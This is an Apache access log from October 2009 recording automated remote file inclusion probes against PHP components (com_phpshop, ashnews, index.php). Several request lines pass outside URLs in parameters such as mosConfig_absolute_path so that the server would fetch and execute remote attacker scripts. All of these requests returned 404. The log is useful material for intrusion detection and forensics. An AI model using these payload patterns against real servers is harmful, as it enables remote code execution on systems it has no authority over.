174.143.3.188 - - [28/Oct/2009:05:16:52 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
174.143.3.188 - - [28/Oct/2009:05:16:52 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Avant Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [28/Oct/2009:05:16:53 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
174.143.3.188 - - [28/Oct/2009:05:16:53 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
61.96.111.133 - - [28/Oct/2009:05:17:05 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:17:32 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:17:51 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.133.240.90 - - [28/Oct/2009:05:17:58 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.133.240.90 - - [28/Oct/2009:05:17:58 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
